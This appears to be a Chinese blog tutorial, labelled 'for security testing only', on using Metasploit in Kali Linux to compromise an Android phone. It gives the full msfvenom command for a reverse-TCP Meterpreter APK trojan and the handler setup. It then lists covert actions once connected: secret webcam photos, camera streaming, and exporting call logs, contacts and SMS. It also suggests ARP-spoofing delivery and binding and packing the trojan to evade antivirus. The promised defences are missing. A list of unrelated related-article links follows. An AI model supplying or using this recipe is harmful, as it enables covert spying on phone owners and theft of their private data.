MSF入侵手機測試(安全測試而已請勿用於非法途徑)

2021-01-10 少善勤樂

MSF測試,既然是入侵,當然需要一個安卓的手機,(電腦也行看自己怎麼方便就行)

msf,也就是我們經常說的Metasploit,只是一種簡稱。它是一個檢測漏洞的工具,裡面集成了微軟發布的大部分漏洞。今天我們已KALI系統為例子說一下它的部分用法和防範方法。

一:首先我們生成一個安卓的木馬,先查看自己電腦的IP,可以在控制終端輸入ipconfig,

IP是192.168.80.132

二:繼續在終端輸入

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.80.132 LPORT=5555 R > /root/apk.apk 輸入完我們會在ROOT目錄看到apk.apk這個文件,這就是生成的木馬,

當然我們還需要設置一些參數,繼續終端輸入msfconsole,

然後輸入

1. use exploit/multi/handler 加載模塊

2. set payload android/meterpreter/reverse_tcp 選擇Payload

3.show options 查看參數設置

四:從控制端我們看到有幾個參數需要設置,輸入

1.set LHOST 192.168.80.132 這裡的地址設置成我們剛才生成木馬的IP位址

2.set LPORT 5555 這裡的埠設置成剛才我們生成木馬所監聽的埠

3.exploit 開始執行漏洞 開始監聽...

五:最重要的一步,把生成的木馬程序放到我們目標手機上安裝,(方法有太多種了,我們是測試所以直接安裝就可以了,還有ARP欺騙安裝,或者把木馬和正常的圖片或程序合成,經過多次加殼好360也是很難檢測出來的)

可以看到已經連接了

接下來我們就可以想幹什麼就幹什麼了,

webcam_snap隱秘拍照

webcam_stream打開攝像頭

通話記錄導出,電話本,簡訊 等等,

相關焦點

  • TrustGo手機安全榮獲AV-TEST測試全球第一名
    全球知名的22家手機反病毒機構參加了本次測試。TrustGo手機安全以安全防護滿分,用戶易用性滿分的好成績榮登榜首。TrustGo手機安全在惡意軟體和風險軟體檢測兩項測試中均取得第一名的成績,檢出率達到100%,誤報率為零。TrustGo手機安全也是唯一一個在安全防護和用戶易用性測試中均獲得滿分的產品。
  • 網上心理測試 別太當真
    南方醫科大學心理學系副教授  肖  蓉   憑直覺選個圖形,看看自己屬於哪類性格;回答幾個問題,預測一下職業發展……如今網絡上所謂的「心理測試」五花八門。每個人都有探索自我的衝動,而簡單易行的心理測試似乎提供了一種途徑。有人從中獲得滿足,也有人對此疑慮重重,這些測試到底靠不靠譜?
  • 當心「星座測試」變成「信息黑洞」
    網絡安全知識乾貨又!來!了!」你是否參加或轉發過上述各種小測試?這類測試是否真的安全呢?03要求你輸入真實姓名、生日、手機號和身份證等個人信息警方提示:請勿輕易點擊、參與、轉發星座、性格等測試,保護好個人信息及隱私數據。
  • 手機智能天線測試系統開發及應用
    數據採集由VTAG開發的四個陣列硬體測試平臺完成,它們是手持式天線陣列測試平臺(HAAT)、MPRG天線陣列測試平臺(MAAT)、失量脈衝響應 (VIPER)和發射分集測試平臺(TDT)。圖1:在多徑環境下採用HAAT的典型試驗。一個發射器用於分集組合試驗,第二個發射器可用於採用自適應波束成型算法的抗幹擾試驗。智能天線可大大提高第三代手持式無線設備的性能。
  • 星座測試趣味足,個人信息易洩露
    網絡安全知識乾貨又!來!了!這類測試是否真的安全呢?03要求你輸入真實姓名、生日、手機號和身份證等個人信息 警方提示 ·請勿輕易點擊、參與、轉發星座、性格等測試,保護好個人信息及隱私數據。
  • 星座測試趣味足,個人信息易洩露
    網絡安全知識乾貨又!來!了!這次,帶你分析星座、性格測試背後的真相精準「避」坑星座測試趣味足,個人信息易洩露「測測你今天的星座運勢」「你的性格更像男生還是女生」這類測試真能未卜先知?或者只為圖一樂呵?下面請上才藝!生活中你是否參加、轉發過各種星座、性格類測試?這類測試是否真的安全呢?
  • 星座測試趣味足 個人信息易洩露
    網絡安全知識乾貨又!來!了!」你是否參加或轉發過上述各種小測試?這類測試是否真的安全呢?03要求你輸入真實姓名、生日、手機號和身份證等個人信息警方提示 ·請勿輕易點擊、參與、轉發星座、性格等測試,保護好個人信息及隱私數據。圖片 | 網絡截圖素材 | 上海網警編輯 | 林鶯
  • 神技:教你10秒破解所有手機的鎖屏密碼
    (圖文/科技辣評)為了安全起見每個手機都會有鎖屏密碼功能,有的是數字的、有的是筆畫的。但是總有個意外,一旦鎖屏密碼忘了怎麼辦?第一想到的就是恢復出廠設置,但是資料也丟了,下面教你幾個小方法,10秒可以破解幾乎所有手機的鎖屏密碼。
  • WLAN設備與手機終端的兼容性測試
    本文主要探討WLAN AC/AP設備如何基於手機類終端的特點,與其進行兼容性測試,保證WLAN網絡對手機有良好的支持。測試中應涵蓋主流手機廠商及其作業系統。涵蓋的常用手機作業系統包括:Android(安卓),Apple OS(蘋果),Symbian(塞班),Windows Mobile,Palm系統,Blackberry系統(黑莓)等。
  • 星座測試雖有趣,但小心個人信息易洩露
    「測測你今天的星座運勢」「你的性格更像男生還是女生」「新年運勢」「未來的你擁有多少資產」「看看你能收到哪所大學錄取通知書」你是否參加或轉發過上述各種小測試?這類測試真能未卜先知?這類測試是否真的安全呢?
  • 【網警提醒】星座測試趣味足,個人信息易洩露
    網絡安全知識乾貨又!來!了!這類測試是否真的安全呢?03要求你輸入真實姓名、生日、手機號和身份證等個人信息 警方提示 ·請勿輕易點擊、參與、轉發星座、性格等測試,保護好個人信息及隱私數據。
  • 【警方提醒】星座測試趣味足,個人信息易洩露
    網絡安全知識乾貨又!來!了!這類測試是否真的安全呢?03要求你輸入真實姓名、生日、手機號和身份證等個人信息 警方提示 請勿輕易點擊、參與、轉發星座、性格等測試,保護好個人信息及隱私數據。
  • #淨網2020# 星座測試趣味足,個人信息易洩露
    網絡安全知識乾貨又!來!了!」你是否參加或轉發過上述各種小測試?這類測試是否真的安全呢?星座測試趣味足,個人信息易洩露要求你輸入真實姓名、生日、手機號和身份證等個人信息,個人信息易洩露請勿輕易點擊、參與、轉發星座、性格等測試,保護好個人信息及隱私數據。
  • 轉發:#淨網2020#星座測試趣味足,個人信息易洩露
    網絡安全知識乾貨又!來!了!這類測試是否真的安全呢?03要求你輸入真實姓名、生日、手機號和身份證等個人信息警方提示 ·請勿輕易點擊、參與、轉發星座、性格等測試,保護好個人信息及隱私數據。
  • 【上海反詐進行時】星座測試趣味足?個人信息易洩露!
    上海公安科技活動周的網絡安全知識乾貨又!來!了!這次,帶你分析星座、性格測試背後的真相是?精準「避」坑!這類測試是否真的安全呢?03要求你輸入真實姓名、生日、手機號和身份證等個人信息警方提示 ·請勿輕易點擊
  • 【網絡課堂】星座測試趣味足,個人信息易洩露
    網絡安全知識乾貨又!來!了!這次,帶你分析星座、性格測試背後的真相精準「避」坑>生活中你是否參加、轉發過各種星座、性格類測試?這類測試是否真的安全呢?>此類測試常常以精準測試氣運、事業、戀愛等理由吸引你的注意。
  • 大渡渡平安說防|星座測試趣味足,個人信息易洩露
    網絡安全知識乾貨又!來!了!這類測試是否真的安全呢?03要求你輸入真實姓名、生日、手機號和身份證等個人信息警方提示 ·請勿輕易點擊、參與、轉發星座、性格等測試,保護好個人信息及隱私數據。
  • ...安全教育日】石棉縣法院兩起案件警示:野生動物保護紅線請勿觸碰!
    【全民國家安全教育日】石棉縣法院兩起案件警示:野生動物保護紅線請勿觸碰!然而,近年來非法獵殺、販賣等破壞野生動物資源的違法犯罪行為接連不斷,全球蔓延的新冠肺炎疫情更是為我們敲響了警鐘,保護野生動物不僅是為了實現保護生物多樣性、維持生態平衡的願景,也是保障人民群眾生命健康安全的迫切需要。
  • 【網安貼士】星座測試趣味足,個人信息易洩露
    網絡安全知識乾貨又!來!了!>生活中你是否參加、轉發過各種星座、性格類測試?這類測試是否真的安全呢?>此類測試常常以精準測試氣運、事業、戀愛等理由吸引你的注意。>要求你輸入真實姓名、生日、手機號和身份證等個人信息04
  • 手機音頻測試中常見測試標準與測試項目
    在多技術集成的複雜電磁環境中,越來越多的外界幹擾影響著音頻的實際使用效果,然而終端產品(如手機)的音頻質量是影響用戶體驗的關鍵因素,針對近期眾多客戶諮詢音頻測試的情況,摩爾實驗室